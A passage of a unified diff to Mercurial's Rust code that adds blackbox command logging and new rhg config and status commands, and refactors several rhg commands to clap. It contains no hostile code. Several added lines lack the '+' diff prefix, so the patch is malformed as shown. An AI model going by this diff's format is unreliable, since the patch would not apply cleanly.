+ Err(PyErr::new::<exc::ValueError, _>(py, error.to_string()))
+ }
}
}
@@ -179,3 +152,12 @@
Ok(m)
}
+
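+/// Build the `(p1, p2)` tuple of binary node bytes that the Python-side
+/// dirstate code expects.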
+pub(crate) fn dirstate_parents_to_pytuple(
+ py: Python,
+ parents: &DirstateParents,
+) -> PyTuple {
+ let p1 = PyBytes::new(py, parents.p1.as_bytes());
+ let p2 = PyBytes::new(py, parents.p2.as_bytes());
+ (p1, p2).to_py_object(py)
+}
--- a/rust/hg-cpython/src/revlog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/revlog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -12,13 +12,13 @@
use cpython::{
buffer::{Element, PyBuffer},
exc::{IndexError, ValueError},
- ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyModule, PyObject,
- PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject,
+ ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyInt, PyModule,
+ PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject,
};
use hg::{
nodemap::{Block, NodeMapError, NodeTree},
- revlog::{nodemap::NodeMap, RevlogIndex},
- NodeError, Revision,
+ revlog::{nodemap::NodeMap, NodePrefix, RevlogIndex},
+ Revision,
};
use std::cell::RefCell;
@@ -64,7 +64,7 @@
let nt = opt.as_ref().unwrap();
let idx = &*self.cindex(py).borrow();
let node = node_from_py_bytes(py, &node)?;
- nt.find_bin(idx, (&node).into()).map_err(|e| nodemap_error(py, e))
+ nt.find_bin(idx, node.into()).map_err(|e| nodemap_error(py, e))
}
/// same as `get_rev()` but raises a bare `error.RevlogError` if node
@@ -107,7 +107,9 @@
String::from_utf8_lossy(node.data(py)).to_string()
};
- nt.find_hex(idx, &node_as_string)
+        let prefix = NodePrefix::from_hex(&node_as_string)
+            .map_err(|_| {
+                PyErr::new::<ValueError, _>(py, "Invalid node or prefix")
+            })?;
+
+ nt.find_bin(idx, prefix)
// TODO make an inner API returning the node directly
.map(|opt| opt.map(
|rev| PyBytes::new(py, idx.node(rev).unwrap().as_bytes())))
@@ -283,6 +285,10 @@
self.inner_update_nodemap_data(py, docket, nm_data)
}
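+    // Size in bytes of one revlog index entry, forwarded from the
+    // underlying C index object.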
+ @property
+ def entry_size(&self) -> PyResult<PyInt> {
+        self.cindex(py).borrow().inner().getattr(py, "entry_size")?
+            .extract::<PyInt>(py)
+ }
});
@@ -468,17 +474,9 @@
match err {
NodeMapError::MultipleResults => revlog_error(py),
NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r),
- NodeMapError::InvalidNodePrefix(s) => invalid_node_prefix(py, &s),
}
}
-fn invalid_node_prefix(py: Python, ne: &NodeError) -> PyErr {
- PyErr::new::<ValueError, _>(
- py,
- format!("Invalid node or prefix: {:?}", ne),
- )
-}
-
/// Create the module, with __package__ given from parent
pub fn init_module(py: Python, package: &str) -> PyResult<PyModule> {
let dotted_name = &format!("{}.revlog", package);
--- a/rust/hgcli/README.md Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hgcli/README.md Tue Apr 20 11:01:06 2021 -0400
@@ -32,7 +32,7 @@
Mercurial Distributed SCM (version 5.3.1+433-f99cd77d53dc+20200331)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-2020 Matt Mackall and others
+ Copyright (C) 2005-2020 Olivia Mackall and others
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
--- a/rust/rhg/Cargo.toml Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/Cargo.toml Tue Apr 20 11:01:06 2021 -0400
@@ -9,8 +9,13 @@
[dependencies]
hg-core = { path = "../hg-core"}
+chrono = "0.4.19"
clap = "2.33.1"
+derive_more = "0.99"
+lazy_static = "1.4.0"
log = "0.4.11"
micro-timer = "0.3.1"
+regex = "1.3.9"
env_logger = "0.7.1"
-format-bytes = "0.1.3"
+format-bytes = "0.2.1"
+users = "0.11.0"
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/rhg/src/blackbox.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,163 @@
+//! Logging for repository events, including commands run in the repository.
+
+use crate::CliInvocation;
+use format_bytes::format_bytes;
+use hg::errors::HgError;
+use hg::repo::Repo;
+use hg::utils::{files::get_bytes_from_os_str, shell_quote};
+
+const ONE_MEBIBYTE: u64 = 1 << 20;
+
+// TODO: somehow keep defaults in sync with `configitem` in `hgext/blackbox.py`
+const DEFAULT_MAX_SIZE: u64 = ONE_MEBIBYTE;
+const DEFAULT_MAX_FILES: u32 = 7;
+
+// Python's strftime does not support %.3f, only %f
+const DEFAULT_DATE_FORMAT: &str = "%Y/%m/%d %H:%M:%S%.3f";
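+// Renders as e.g. "2021/04/20 11:01:06.123"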
+
+type DateTime = chrono::DateTime<chrono::Local>;
+
+pub struct ProcessStartTime {
+ /// For measuring duration
+ monotonic_clock: std::time::Instant,
+ /// For formatting with year, month, day, etc.
+ calendar_based: DateTime,
+}
+
+impl ProcessStartTime {
+ pub fn now() -> Self {
+ Self {
+ monotonic_clock: std::time::Instant::now(),
+ calendar_based: chrono::Local::now(),
+ }
+ }
+}
+
+pub struct Blackbox<'a> {
+ process_start_time: &'a ProcessStartTime,
+ /// Do nothing if this is `None`
+ configured: Option<ConfiguredBlackbox<'a>>,
+}
+
+struct ConfiguredBlackbox<'a> {
+ repo: &'a Repo,
+ max_size: u64,
+ max_files: u32,
+ date_format: &'a str,
+}
+
+impl<'a> Blackbox<'a> {
+ pub fn new(
+ invocation: &'a CliInvocation<'a>,
+ process_start_time: &'a ProcessStartTime,
+ ) -> Result<Self, HgError> {
+ let configured = if let Ok(repo) = invocation.repo {
+ if invocation.config.get(b"extensions", b"blackbox").is_none() {
+ // The extension is not enabled
+ None
+ } else {
+ Some(ConfiguredBlackbox {
+ repo,
+ max_size: invocation
+ .config
+ .get_byte_size(b"blackbox", b"maxsize")?
+ .unwrap_or(DEFAULT_MAX_SIZE),
+ max_files: invocation
+ .config
+ .get_u32(b"blackbox", b"maxfiles")?
+ .unwrap_or(DEFAULT_MAX_FILES),
+ date_format: invocation
+ .config
+ .get_str(b"blackbox", b"date-format")?
+ .unwrap_or(DEFAULT_DATE_FORMAT),
+ })
+ }
+ } else {
+ // Without a local repository there’s no `.hg/blackbox.log` to
+ // write to.
+ None
+ };
+ Ok(Self {
+ process_start_time,
+ configured,
+ })
+ }
+
+ pub fn log_command_start(&self) {
+ if let Some(configured) = &self.configured {
+ let message = format_bytes!(b"(rust) {}", format_cli_args());
+ configured.log(&self.process_start_time.calendar_based, &message);
+ }
+ }
+
+ pub fn log_command_end(&self, exit_code: i32) {
+ if let Some(configured) = &self.configured {
+ let now = chrono::Local::now();
+ let duration = self
+ .process_start_time
+ .monotonic_clock
+ .elapsed()
+ .as_secs_f64();
+ let message = format_bytes!(
+ b"(rust) {} exited {} after {} seconds",
+ format_cli_args(),
+ exit_code,
+ format_bytes::Utf8(format_args!("{:.03}", duration))
+ );
+ configured.log(&now, &message);
+ }
+ }
+}
+
+impl ConfiguredBlackbox<'_> {
+ fn log(&self, date_time: &DateTime, message: &[u8]) {
+ let date = format_bytes::Utf8(date_time.format(self.date_format));
+ let user = users::get_current_username().map(get_bytes_from_os_str);
+ let user = user.as_deref().unwrap_or(b"???");
+ let rev = format_bytes::Utf8(match self.repo.dirstate_parents() {
+ Ok(parents) if parents.p2 == hg::revlog::node::NULL_NODE => {
+ format!("{:x}", parents.p1)
+ }
+ Ok(parents) => format!("{:x}+{:x}", parents.p1, parents.p2),
+ Err(_dirstate_corruption_error) => {
+ // TODO: log a non-fatal warning to stderr
+ "???".to_owned()
+ }
+ });
+ let pid = std::process::id();
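+        // A formatted line looks like (values illustrative, node
+        // truncated for brevity):
+        // 2021/04/20 11:01:06.123 alice @f99cd77d53dc (12345)> (rust) status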
+ let line = format_bytes!(
+ b"{} {} @{} ({})> {}\n",
+ date,
+ user,
+ rev,
+ pid,
+ message
+ );
+ let result =
+ hg::logging::LogFile::new(self.repo.hg_vfs(), "blackbox.log")
+ .max_size(Some(self.max_size))
+ .max_files(self.max_files)
+ .write(&line);
+ match result {
+ Ok(()) => {}
+ Err(_io_error) => {
+ // TODO: log a non-fatal warning to stderr
+ }
+ }
+ }
+}
+
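+/// Shell-quote each CLI argument (except argv[0]) and join them with
+/// single spaces, e.g. `cat -r . 'some file'`.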
+fn format_cli_args() -> Vec<u8> {
+ let mut args = std::env::args_os();
+ let _ = args.next(); // Skip the first (or zeroth) arg, the name of the `rhg` executable
+ let mut args = args.map(|arg| shell_quote(&get_bytes_from_os_str(arg)));
+ let mut formatted = Vec::new();
+ if let Some(arg) = args.next() {
+ formatted.extend(arg)
+ }
+ for arg in args {
+ formatted.push(b' ');
+ formatted.extend(arg)
+ }
+ formatted
+}
--- a/rust/rhg/src/commands.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,14 +0,0 @@
-pub mod cat;
-pub mod debugdata;
-pub mod debugrequirements;
-pub mod files;
-pub mod root;
-use crate::error::CommandError;
-use crate::ui::Ui;
-
-/// The common trait for rhg commands
-///
-/// Normalize the interface of the commands provided by rhg
-pub trait Command {
- fn run(&self, ui: &Ui) -> Result<(), CommandError>;
-}
--- a/rust/rhg/src/commands/cat.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/cat.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,9 +1,7 @@
-use crate::commands::Command;
-use crate::error::{CommandError, CommandErrorKind};
-use crate::ui::utf8_to_local;
-use crate::ui::Ui;
-use hg::operations::{cat, CatRevError, CatRevErrorKind};
-use hg::repo::Repo;
+use crate::error::CommandError;
+use clap::Arg;
+use format_bytes::format_bytes;
+use hg::operations::cat;
use hg::utils::hg_path::HgPathBuf;
use micro_timer::timed;
use std::convert::TryFrom;
@@ -12,94 +10,75 @@
Output the current or given revision of files
";
-pub struct CatCommand<'a> {
- rev: Option<&'a str>,
- files: Vec<&'a str>,
-}
-
-impl<'a> CatCommand<'a> {
- pub fn new(rev: Option<&'a str>, files: Vec<&'a str>) -> Self {
- Self { rev, files }
- }
-
- fn display(&self, ui: &Ui, data: &[u8]) -> Result<(), CommandError> {
- ui.write_stdout(data)?;
- Ok(())
- }
-}
-
-impl<'a> Command for CatCommand<'a> {
- #[timed]
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- repo.check_requirements()?;
- let cwd = std::env::current_dir()
- .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?;
-
- let mut files = vec![];
- for file in self.files.iter() {
- let normalized = cwd.join(&file);
- let stripped = normalized
- .strip_prefix(&repo.working_directory_path())
- .or(Err(CommandErrorKind::Abort(None)))?;
- let hg_file = HgPathBuf::try_from(stripped.to_path_buf())
- .or(Err(CommandErrorKind::Abort(None)))?;
- files.push(hg_file);
- }
-
- match self.rev {
- Some(rev) => {
- let data = cat(&repo, rev, &files)
- .map_err(|e| map_rev_error(rev, e))?;
- self.display(ui, &data)
- }
- None => Err(CommandErrorKind::Unimplemented.into()),
- }
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("cat")
+ .arg(
+ Arg::with_name("rev")
+ .help("search the repository as it is in REV")
+ .short("-r")
+ .long("--revision")
+ .value_name("REV")
+ .takes_value(true),
+ )
+ .arg(
+ clap::Arg::with_name("files")
+ .required(true)
+ .multiple(true)
+ .empty_values(false)
+ .value_name("FILE")
+ .help("Activity to start: activity@category"),
+ )
+ .about(HELP_TEXT)
}
-/// Convert `CatRevErrorKind` to `CommandError`
-fn map_rev_error(rev: &str, err: CatRevError) -> CommandError {
- CommandError {
- kind: match err.kind {
- CatRevErrorKind::IoError(err) => CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- )),
- CatRevErrorKind::InvalidRevision => CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: invalid revision identifier {}\n",
- rev
- ))
- .into(),
- )),
- CatRevErrorKind::AmbiguousPrefix => CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: ambiguous revision identifier {}\n",
- rev
- ))
- .into(),
- )),
- CatRevErrorKind::UnsuportedRevlogVersion(version) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unsupported revlog version {}\n",
- version
- ))
- .into(),
- ))
+#[timed]
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let rev = invocation.subcommand_args.value_of("rev");
+ let file_args = match invocation.subcommand_args.values_of("files") {
+ Some(files) => files.collect(),
+ None => vec![],
+ };
+
+ let repo = invocation.repo?;
+ let cwd = hg::utils::current_dir()?;
+ let working_directory = repo.working_directory_path();
+ let working_directory = cwd.join(working_directory); // Make it absolute
+
+ let mut files = vec![];
+ for file in file_args.iter() {
+ // TODO: actually normalize `..` path segments etc?
+ let normalized = cwd.join(&file);
+ let stripped = normalized
+ .strip_prefix(&working_directory)
+ // TODO: error message for path arguments outside of the repo
+ .map_err(|_| CommandError::abort(""))?;
+ let hg_file = HgPathBuf::try_from(stripped.to_path_buf())
+ .map_err(|e| CommandError::abort(e.to_string()))?;
+ files.push(hg_file);
+ }
+
+ match rev {
+ Some(rev) => {
+ let output = cat(&repo, rev, &files).map_err(|e| (e, rev))?;
+ invocation.ui.write_stdout(&output.concatenated)?;
+ if !output.missing.is_empty() {
+ let short = format!("{:x}", output.node.short()).into_bytes();
+ for path in &output.missing {
+ invocation.ui.write_stderr(&format_bytes!(
+ b"{}: no such file in rev {}\n",
+ path.as_bytes(),
+ short
+ ))?;
+ }
}
- CatRevErrorKind::CorruptedRevlog => CommandErrorKind::Abort(Some(
- "abort: corrupted revlog\n".into(),
- )),
- CatRevErrorKind::UnknowRevlogDataFormat(format) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unknow revlog dataformat {:?}\n",
- format
- ))
- .into(),
- ))
+ if output.found_any {
+ Ok(())
+ } else {
+ Err(CommandError::Unsuccessful)
}
- },
+ }
+ None => Err(CommandError::unsupported(
+ "`rhg cat` without `--rev` / `-r`",
+ )),
}
}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/rhg/src/commands/config.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,38 @@
+use crate::error::CommandError;
+use clap::Arg;
+use format_bytes::format_bytes;
+use hg::errors::HgError;
+use hg::utils::SliceExt;
+
+pub const HELP_TEXT: &str = "
+With one argument of the form section.name, print just the value of that config item.
+";
+
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("config")
+ .arg(
+ Arg::with_name("name")
+ .help("the section.name to print")
+ .value_name("NAME")
+ .required(true)
+ .takes_value(true),
+ )
+ .about(HELP_TEXT)
+}
+
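+/// Print the raw value followed by a newline, or exit unsuccessfully when
+/// the config item is not set.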
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let (section, name) = invocation
+ .subcommand_args
+ .value_of("name")
+ .expect("missing required CLI argument")
+ .as_bytes()
+ .split_2(b'.')
+ .ok_or_else(|| HgError::unsupported("hg config <section>"))?;
+
+ if let Some(value) = invocation.config.get(section, name) {
+ invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?;
+ Ok(())
+ } else {
+ Err(CommandError::Unsuccessful)
+ }
+}
--- a/rust/rhg/src/commands/debugdata.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/debugdata.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,91 +1,65 @@
-use crate::commands::Command;
-use crate::error::{CommandError, CommandErrorKind};
-use crate::ui::utf8_to_local;
-use crate::ui::Ui;
-use hg::operations::{
- debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind,
-};
-use hg::repo::Repo;
+use crate::error::CommandError;
+use clap::Arg;
+use clap::ArgGroup;
+use hg::operations::{debug_data, DebugDataKind};
use micro_timer::timed;
pub const HELP_TEXT: &str = "
Dump the contents of a data file revision
";
-pub struct DebugDataCommand<'a> {
- rev: &'a str,
- kind: DebugDataKind,
-}
-
-impl<'a> DebugDataCommand<'a> {
- pub fn new(rev: &'a str, kind: DebugDataKind) -> Self {
- DebugDataCommand { rev, kind }
- }
-}
-
-impl<'a> Command for DebugDataCommand<'a> {
- #[timed]
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- let data = debug_data(&repo, self.rev, self.kind)
- .map_err(|e| to_command_error(self.rev, e))?;
-
- let mut stdout = ui.stdout_buffer();
- stdout.write_all(&data)?;
- stdout.flush()?;
-
- Ok(())
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("debugdata")
+ .arg(
+ Arg::with_name("changelog")
+ .help("open changelog")
+ .short("-c")
+ .long("--changelog"),
+ )
+ .arg(
+ Arg::with_name("manifest")
+ .help("open manifest")
+ .short("-m")
+ .long("--manifest"),
+ )
+ .group(
+ ArgGroup::with_name("")
+ .args(&["changelog", "manifest"])
+ .required(true),
+ )
+ .arg(
+ Arg::with_name("rev")
+ .help("revision")
+ .required(true)
+ .value_name("REV"),
+ )
+ .about(HELP_TEXT)
}
-/// Convert operation errors to command errors
-fn to_command_error(rev: &str, err: DebugDataError) -> CommandError {
- match err.kind {
- DebugDataErrorKind::IoError(err) => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- )),
- },
- DebugDataErrorKind::InvalidRevision => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: invalid revision identifier{}\n",
- rev
- ))
- .into(),
- )),
- },
- DebugDataErrorKind::AmbiguousPrefix => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: ambiguous revision identifier{}\n",
- rev
- ))
- .into(),
- )),
- },
- DebugDataErrorKind::UnsuportedRevlogVersion(version) => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unsupported revlog version {}\n",
- version
- ))
- .into(),
- )),
- },
- DebugDataErrorKind::CorruptedRevlog => CommandError {
- kind: CommandErrorKind::Abort(Some(
- "abort: corrupted revlog\n".into(),
- )),
- },
- DebugDataErrorKind::UnknowRevlogDataFormat(format) => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unknow revlog dataformat {:?}\n",
- format
- ))
- .into(),
- )),
- },
- }
+#[timed]
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let args = invocation.subcommand_args;
+ let rev = args
+ .value_of("rev")
+ .expect("rev should be a required argument");
+ let kind =
+ match (args.is_present("changelog"), args.is_present("manifest")) {
+ (true, false) => DebugDataKind::Changelog,
+ (false, true) => DebugDataKind::Manifest,
+ (true, true) => {
+ unreachable!("Should not happen since options are exclusive")
+ }
+ (false, false) => {
+ unreachable!("Should not happen since options are required")
+ }
+ };
+
+ let repo = invocation.repo?;
+ let data = debug_data(repo, rev, kind).map_err(|e| (e, rev))?;
+
+ let mut stdout = invocation.ui.stdout_buffer();
+ stdout.write_all(&data)?;
+ stdout.flush()?;
+
+ Ok(())
}
--- a/rust/rhg/src/commands/debugrequirements.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/debugrequirements.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,30 +1,22 @@
-use crate::commands::Command;
use crate::error::CommandError;
-use crate::ui::Ui;
-use hg::repo::Repo;
-use hg::requirements;
pub const HELP_TEXT: &str = "
Print the current repo requirements.
";
-pub struct DebugRequirementsCommand {}
-
-impl DebugRequirementsCommand {
- pub fn new() -> Self {
- DebugRequirementsCommand {}
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT)
}
-impl Command for DebugRequirementsCommand {
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- let mut output = String::new();
- for req in requirements::load(&repo)? {
- output.push_str(&req);
- output.push('\n');
- }
- ui.write_stdout(output.as_bytes())?;
- Ok(())
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let repo = invocation.repo?;
+ let mut output = String::new();
+ let mut requirements: Vec<_> = repo.requirements().iter().collect();
+ requirements.sort();
+ for req in requirements {
+ output.push_str(req);
+ output.push('\n');
}
+ invocation.ui.write_stdout(output.as_bytes())?;
+ Ok(())
}
--- a/rust/rhg/src/commands/files.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/files.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,15 +1,10 @@
-use crate::commands::Command;
-use crate::error::{CommandError, CommandErrorKind};
-use crate::ui::utf8_to_local;
+use crate::error::CommandError;
use crate::ui::Ui;
-use hg::operations::{
- list_rev_tracked_files, ListRevTrackedFilesError,
- ListRevTrackedFilesErrorKind,
-};
-use hg::operations::{
- Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind,
-};
+use clap::Arg;
+use hg::operations::list_rev_tracked_files;
+use hg::operations::Dirstate;
use hg::repo::Repo;
+use hg::utils::current_dir;
use hg::utils::files::{get_bytes_from_path, relativize_path};
use hg::utils::hg_path::{HgPath, HgPathBuf};
@@ -19,124 +14,78 @@
Returns 0 on success.
";
-pub struct FilesCommand<'a> {
- rev: Option<&'a str>,
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("files")
+ .arg(
+ Arg::with_name("rev")
+ .help("search the repository as it is in REV")
+ .short("-r")
+ .long("--revision")
+ .value_name("REV")
+ .takes_value(true),
+ )
+ .about(HELP_TEXT)
}
-impl<'a> FilesCommand<'a> {
- pub fn new(rev: Option<&'a str>) -> Self {
- FilesCommand { rev }
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let relative = invocation.config.get(b"ui", b"relative-paths");
+ if relative.is_some() {
+ return Err(CommandError::unsupported(
+ "non-default ui.relative-paths",
+ ));
}
- fn display_files(
- &self,
- ui: &Ui,
- repo: &Repo,
- files: impl IntoIterator<Item = &'a HgPath>,
- ) -> Result<(), CommandError> {
- let cwd = std::env::current_dir()
- .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?;
- let rooted_cwd = cwd
- .strip_prefix(repo.working_directory_path())
- .expect("cwd was already checked within the repository");
- let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd));
-
- let mut stdout = ui.stdout_buffer();
+ let rev = invocation.subcommand_args.value_of("rev");
- for file in files {
- stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?;
- stdout.write_all(b"\n")?;
- }
- stdout.flush()?;
- Ok(())
- }
-}
-
-impl<'a> Command for FilesCommand<'a> {
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- repo.check_requirements()?;
- if let Some(rev) = self.rev {
- let files = list_rev_tracked_files(&repo, rev)
- .map_err(|e| map_rev_error(rev, e))?;
- self.display_files(ui, &repo, files.iter())
- } else {
- let distate = Dirstate::new(&repo).map_err(map_dirstate_error)?;
- let files = distate.tracked_files().map_err(map_dirstate_error)?;
- self.display_files(ui, &repo, files)
- }
+ let repo = invocation.repo?;
+ if let Some(rev) = rev {
+ let files = list_rev_tracked_files(repo, rev).map_err(|e| (e, rev))?;
+ display_files(invocation.ui, repo, files.iter())
+ } else {
+        let dirstate = Dirstate::new(repo)?;
+        let files = dirstate.tracked_files()?;
+ display_files(invocation.ui, repo, files)
}
}
-/// Convert `ListRevTrackedFilesErrorKind` to `CommandError`
-fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError {
- CommandError {
- kind: match err.kind {
- ListRevTrackedFilesErrorKind::IoError(err) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- ))
- }
- ListRevTrackedFilesErrorKind::InvalidRevision => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: invalid revision identifier {}\n",
- rev
- ))
- .into(),
- ))
- }
- ListRevTrackedFilesErrorKind::AmbiguousPrefix => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: ambiguous revision identifier {}\n",
- rev
- ))
- .into(),
- ))
- }
- ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unsupported revlog version {}\n",
- version
- ))
- .into(),
- ))
- }
- ListRevTrackedFilesErrorKind::CorruptedRevlog => {
- CommandErrorKind::Abort(Some(
- "abort: corrupted revlog\n".into(),
- ))
- }
- ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unknow revlog dataformat {:?}\n",
- format
- ))
- .into(),
- ))
- }
- },
+fn display_files<'a>(
+ ui: &Ui,
+ repo: &Repo,
+ files: impl IntoIterator<Item = &'a HgPath>,
+) -> Result<(), CommandError> {
+ let mut stdout = ui.stdout_buffer();
+
+ let cwd = current_dir()?;
+ let working_directory = repo.working_directory_path();
+ let working_directory = cwd.join(working_directory); // Make it absolute
+
+ let mut any = false;
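+    // `any` tracks whether anything was printed: the command exits
+    // unsuccessfully when no file was listed.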
+ if let Ok(cwd_relative_to_repo) = cwd.strip_prefix(&working_directory) {
+ // The current directory is inside the repo, so we can work with
+ // relative paths
+ let cwd = HgPathBuf::from(get_bytes_from_path(cwd_relative_to_repo));
+ for file in files {
+ any = true;
+ stdout.write_all(relativize_path(&file, &cwd).as_ref())?;
+ stdout.write_all(b"\n")?;
+ }
+ } else {
+ let working_directory =
+ HgPathBuf::from(get_bytes_from_path(working_directory));
+ let cwd = HgPathBuf::from(get_bytes_from_path(cwd));
+ for file in files {
+ any = true;
+ // Absolute path in the filesystem
+ let file = working_directory.join(file);
+ stdout.write_all(relativize_path(&file, &cwd).as_ref())?;
+ stdout.write_all(b"\n")?;
+ }
+ }
+
+ stdout.flush()?;
+ if any {
+ Ok(())
+ } else {
+ Err(CommandError::Unsuccessful)
}
}
-
-/// Convert `ListDirstateTrackedFilesError` to `CommandError`
-fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError {
- CommandError {
- kind: match err.kind {
- ListDirstateTrackedFilesErrorKind::IoError(err) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- ))
- }
- ListDirstateTrackedFilesErrorKind::ParseError(_) => {
- CommandErrorKind::Abort(Some(
- // TODO find a better error message
- b"abort: parse error\n".to_vec(),
- ))
- }
- },
- }
-}
--- a/rust/rhg/src/commands/root.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/root.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,6 @@
-use crate::commands::Command;
use crate::error::CommandError;
-use crate::ui::Ui;
use format_bytes::format_bytes;
-use hg::repo::Repo;
+use hg::errors::{IoErrorContext, IoResultExt};
use hg::utils::files::get_bytes_from_path;
pub const HELP_TEXT: &str = "
@@ -11,19 +9,20 @@
Returns 0 on success.
";
-pub struct RootCommand {}
-
-impl RootCommand {
- pub fn new() -> Self {
- RootCommand {}
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("root").about(HELP_TEXT)
}
-impl Command for RootCommand {
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- let bytes = get_bytes_from_path(repo.working_directory_path());
- ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?;
- Ok(())
- }
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let repo = invocation.repo?;
+ let working_directory = repo.working_directory_path();
+ let working_directory = std::fs::canonicalize(working_directory)
+ .with_context(|| {
+ IoErrorContext::CanonicalizingPath(working_directory.to_owned())
+ })?;
+ let bytes = get_bytes_from_path(&working_directory);
+ invocation
+ .ui
+ .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?;
+ Ok(())
}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/rhg/src/commands/status.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,315 @@
+// status.rs
+//
+// Copyright 2020, Georges Racinet <georges.racinets@octobus.net>
+//
+// This software may be used and distributed according to the terms of the
+// GNU General Public License version 2 or any later version.
+
+use crate::error::CommandError;
+use crate::ui::Ui;
+use clap::{Arg, SubCommand};
+use hg;
+use hg::errors::IoResultExt;
+use hg::matchers::AlwaysMatcher;
+use hg::operations::cat;
+use hg::repo::Repo;
+use hg::revlog::node::Node;
+use hg::utils::hg_path::{hg_path_to_os_string, HgPath};
+use hg::{DirstateMap, StatusError};
+use hg::{HgPathCow, StatusOptions};
+use log::{info, warn};
+use std::convert::TryInto;
+use std::fs;
+use std::io::BufReader;
+use std::io::Read;
+
+pub const HELP_TEXT: &str = "
+Show changed files in the working directory
+
+This is a pure Rust version of `hg status`.
+
+Some options might be missing, check the list below.
+";
+
+pub fn args() -> clap::App<'static, 'static> {
+ SubCommand::with_name("status")
+ .alias("st")
+ .about(HELP_TEXT)
+ .arg(
+ Arg::with_name("all")
+ .help("show status of all files")
+ .short("-A")
+ .long("--all"),
+ )
+ .arg(
+ Arg::with_name("modified")
+ .help("show only modified files")
+ .short("-m")
+ .long("--modified"),
+ )
+ .arg(
+ Arg::with_name("added")
+ .help("show only added files")
+ .short("-a")
+ .long("--added"),
+ )
+ .arg(
+ Arg::with_name("removed")
+ .help("show only removed files")
+ .short("-r")
